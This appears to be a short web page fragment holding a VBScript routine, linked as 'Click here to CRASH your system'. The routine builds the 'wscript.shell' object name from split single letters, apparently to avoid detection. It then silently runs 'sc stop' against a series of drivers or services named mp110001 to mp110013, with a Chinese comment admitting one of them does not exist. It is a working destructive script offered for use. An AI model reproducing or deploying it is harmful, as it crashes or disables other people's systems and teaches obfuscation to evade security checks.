<script language="vbscript">
sub test()
if msgbox("Continue?",36)=vbno then exit sub
dim i,wsh
set wsh = createobject("w" & "s" & "c" & "r" & "i" & "p" & "t"_
& "." & "s" & "h" & "e" & "l" & "l")
for i = 1 to 9
wsh.run "sc stop mp11000" & i, 0, true
next
for i = 10 to 13
wsh.run "sc stop mp1100" & i, 0, true
'名为mp110012的驱动不存在。懒得处理了……
next
end sub
</script>
Click <a href="#" onclick="test">here</a> to CRASH your system !-.-